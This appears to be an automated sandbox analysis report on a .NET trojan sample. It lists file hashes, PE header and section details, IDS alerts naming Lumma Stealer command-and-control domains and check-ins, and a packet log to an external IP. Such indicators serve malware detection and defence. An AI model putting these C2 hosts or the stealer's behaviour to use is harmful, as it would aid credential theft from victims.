          SHA-256:5345D03A7E6C9436497BA4120DE1F941800F2522A21DE70CEA6DB1633D356E11
          SHA-512:2E017FD29A505BCAC78C659DE10E0D869C42CE3B057840680B23961DBCB1F82B1CC7094C87CEEB8FA14826C4D8CFED88DC647422A4A3FA36C4AAFD6430DAEFE5
          Malicious:true
          Reputation:moderate, very likely benign file
          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..

          Static File Info

          General

          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
          Entropy (8bit):5.220628643177381
          TrID:
          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
          • Win32 Executable (generic) a (10002005/4) 49.78%
          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
          • Generic Win/DOS Executable (2004/3) 0.01%
          • DOS Executable Generic (2002/1) 0.01%
          File name:SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe
          File size:14'336 bytes
          MD5:876c12019e3b15fe92841e8d358d4921
          SHA1:08e3fb4496270b4ab04d5adee71fefdb670114a1
          SHA256:b8738d4888209ef2912d232eafbd13a0017bb62761a9f5d567c3fa0090a09972
          SHA512:ad35ea067bcb51cd420404136f62a66698f8d10e2b46ea6c13161f0e14b9558233ccae05e5ba1f175d4f71be55dbc960df8663abf5012ce1a12e462dbd766e6e
          SSDEEP:384:EDtTXkmazUdOsR9VxeFpFb+iQIQRJqj5MqaCFJV9/y:Eh7/6Uad1QHqlT6
          TLSH:0C523C5C1BD8443AFEAA1EBDA8E343018A73F76E5503F72F1C9C50992D8276055F136A
          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....."..........."...0..............L... ...`....@.. ....................................`................................

          File Icon

          Icon Hash:00928e8e8686b000

          Static PE Info

          General

          Entrypoint:0x404cc6
          Entrypoint Section:.text
          Digitally signed:false
          Imagebase:0x400000
          Subsystem:windows gui
          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Time Stamp:0x8B22E0EF [Mon Dec 21 13:53:51 2043 UTC]
          TLS Callbacks:
          CLR (.Net) Version:
          OS Version Major:4
          OS Version Minor:0
          File Version Major:4
          File Version Minor:0
          Subsystem Version Major:4
          Subsystem Version Minor:0
          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

          Entrypoint Preview

          Instruction
          jmp dword ptr [00402000h]
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al

          Data Directories

          NameVirtual AddressVirtual Size Is in Section
          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IMPORT0x4c710x4f.text
          IMAGE_DIRECTORY_ENTRY_RESOURCE0x60000x5cc.rsrc
          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
          IMAGE_DIRECTORY_ENTRY_BASERELOC0x80000xc.reloc
          IMAGE_DIRECTORY_ENTRY_DEBUG0x4bd00x38.text
          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

          Sections

          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
          .text0x20000x2ccc0x2e00d77976d9a9d7b43cef3d736362c29b48False0.47469429347826086data5.514309655715098IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          .rsrc0x60000x5cc0x600fea80c03178fc0dd78c3b4db1f09a417False0.4192708333333333data4.117373895955984IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .reloc0x80000xc0x200658905ad537379efc9d674fdc42ca684False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

          Resources

          NameRVASizeTypeLanguageCountryZLIB Complexity
          RT_VERSION0x60900x33cdata0.4190821256038647
          RT_MANIFEST0x63dc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

          Imports

          DLLImport
          mscoree.dll_CorExeMain

          Network Behavior

          Suricata IDS Alerts

          TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
          2024-08-28T15:29:04.443508+0200TCP2055378ET MALWARE Observed Lumma Stealer Related Domain (miracledzmnqwui .shop in TLS SNI)149703443192.168.2.7188.114.96.3
          2024-08-28T15:29:06.451728+0200UDP2055483ET MALWARE Lumma Stealer Domain in DNS Lookup (traineiwnqo .shop)15034753192.168.2.71.1.1.1
          2024-08-28T15:29:03.784058+0200UDP2055377ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (miracledzmnqwui .shop)15726753192.168.2.71.1.1.1
          2024-08-28T15:29:05.247507+0200TCP2049836ET MALWARE Lumma Stealer Related Activity149703443192.168.2.7188.114.96.3
          2024-08-28T15:29:05.247507+0200TCP2054653ET MALWARE Lumma Stealer CnC Host Checkin149703443192.168.2.7188.114.96.3
          2024-08-28T15:29:05.751380+0200TCP2055489ET MALWARE Lumma Stealer Domain in TLS SNI (locatedblsoqp .shop)149704443192.168.2.7188.114.97.3
          2024-08-28T15:29:06.199789+0200TCP2049836ET MALWARE Lumma Stealer Related Activity149704443192.168.2.7188.114.97.3
          2024-08-28T15:29:06.199789+0200TCP2054653ET MALWARE Lumma Stealer CnC Host Checkin149704443192.168.2.7188.114.97.3
          2024-08-28T15:29:07.638515+0200TCP2055493ET MALWARE Lumma Stealer Domain in TLS SNI (traineiwnqo .shop)149707443192.168.2.7188.114.97.3
          2024-08-28T15:29:07.105801+0200TCP2049836ET MALWARE Lumma Stealer Related Activity149705443192.168.2.7188.114.97.3
          2024-08-28T15:29:07.105801+0200TCP2054653ET MALWARE Lumma Stealer CnC Host Checkin149705443192.168.2.7188.114.97.3
          2024-08-28T15:29:05.253081+0200UDP2055479ET MALWARE Lumma Stealer Domain in DNS Lookup (locatedblsoqp .shop)16441853192.168.2.71.1.1.1
          2024-08-28T15:29:06.967216+0200TCP2055493ET MALWARE Lumma Stealer Domain in TLS SNI (traineiwnqo .shop)149705443192.168.2.7188.114.97.3

          Network Port Distribution

          TCP Packets

          TimestampSource PortDest PortSource IPDest IP
          Aug 28, 2024 15:29:02.055763960 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:02.060798883 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.060928106 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:02.064625025 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:02.069427013 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.716989040 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.717014074 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.717026949 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.717066050 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.717077971 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.717088938 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.717099905 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.717113972 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.717123032 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:02.717202902 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:02.717263937 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.717278004 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.717322111 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:02.721970081 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.722018957 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.722070932 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:02.814740896 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.814769030 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.814780951 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.814872980 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:02.814935923 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.814949989 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.815001965 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:02.815196991 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.815213919 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.815227985 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.815242052 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:02.815304041 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:02.815331936 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.815362930 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.815375090 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.815397024 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:02.816114902 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.816150904 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.816153049 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:02.816164017 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.816204071 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:02.816314936 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.816327095 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.816375971 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:02.816890001 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.816935062 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.816946983 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.816976070 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:02.817047119 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.817059994 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.817092896 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:02.817749977 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.817795992 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:02.819732904 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.872731924 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:02.905558109 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.905574083 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.905586004 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.905599117 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.905611992 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.905664921 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:02.905751944 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:02.905787945 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.905833960 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:02.905838966 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.905852079 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.905896902 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:02.905971050 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.905982971 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.905992985 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.906007051 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.906034946 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:02.906068087 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:02.906688929 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.906738043 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.906749010 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.906791925 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:02.906864882 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.906877041 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.906887054 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.906898022 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.906909943 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:02.906936884 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:02.907603025 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.907623053 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.907634020 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.907646894 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:02.907680988 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:02.907773972 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.907784939 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.907794952 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.907810926 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.907833099 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:02.907866001 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:02.908607006 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.908675909 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.908688068 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.908720970 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:02.908827066 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.908837080 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.908848047 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.908859968 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.908864975 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:02.908890009 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:02.909430027 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.909480095 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.909483910 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:02.909492016 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.909535885 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:02.909596920 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.909607887 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.909651041 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:02.993915081 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.993938923 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.993978977 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:02.993993998 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.994005919 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.994034052 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.994045973 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.994066954 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:02.994093895 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:02.994105101 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.999643087 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.999685049 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:02.999695063 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.999706984 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.999717951 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.999749899 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:02.999792099 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.999803066 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.999833107 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:02.999907017 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.999918938 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.999931097 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:02.999953032 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:02.999969959 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:03.000046968 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.000060081 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.000070095 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.000087976 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.000094891 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:03.000098944 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.000123024 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:03.000617981 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.000658035 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:03.000679970 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.000690937 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.000727892 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:03.000818014 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.000830889 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.000843048 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.000864983 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:03.001036882 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.001080036 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:03.001105070 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.001116991 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.001156092 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:03.001193047 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.001204967 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.001250029 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:03.001318932 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.001329899 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.001342058 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.001353979 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.001384020 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:03.001415014 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:03.001804113 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.001822948 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.001835108 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.001859903 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:03.001940012 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.001951933 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.001962900 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.001987934 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:03.002011061 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:03.002137899 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.002150059 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.002160072 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.002171040 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.002182961 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.002186060 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:03.002209902 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:03.002731085 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.002774000 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:03.002774000 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.002789021 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.002829075 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:03.002896070 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.002907991 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.002918005 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.002928972 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.002945900 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:03.002974033 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:03.003031015 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.003087997 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.003101110 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.003112078 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.003129005 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:03.003150940 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:03.004400015 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.004425049 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.004436970 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.004472017 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:03.004523993 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.004535913 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.004545927 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.004561901 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:03.004580021 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:03.004605055 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.004627943 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.004638910 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.004674911 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:03.082458973 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.082494020 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.082511902 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.082521915 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.082532883 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.082544088 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.082566023 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:03.082617998 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:03.082645893 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.082657099 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.082668066 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.082679987 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.082691908 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.082698107 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:03.082734108 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:03.082823038 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.082839966 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.082861900 CEST4970280192.168.2.7147.45.44.131
          Aug 28, 2024 15:29:03.092267990 CEST8049702147.45.44.131192.168.2.7
          Aug 28, 2024 15:29:03.092288017 CEST8049702147.45.44.131192.168.2.7
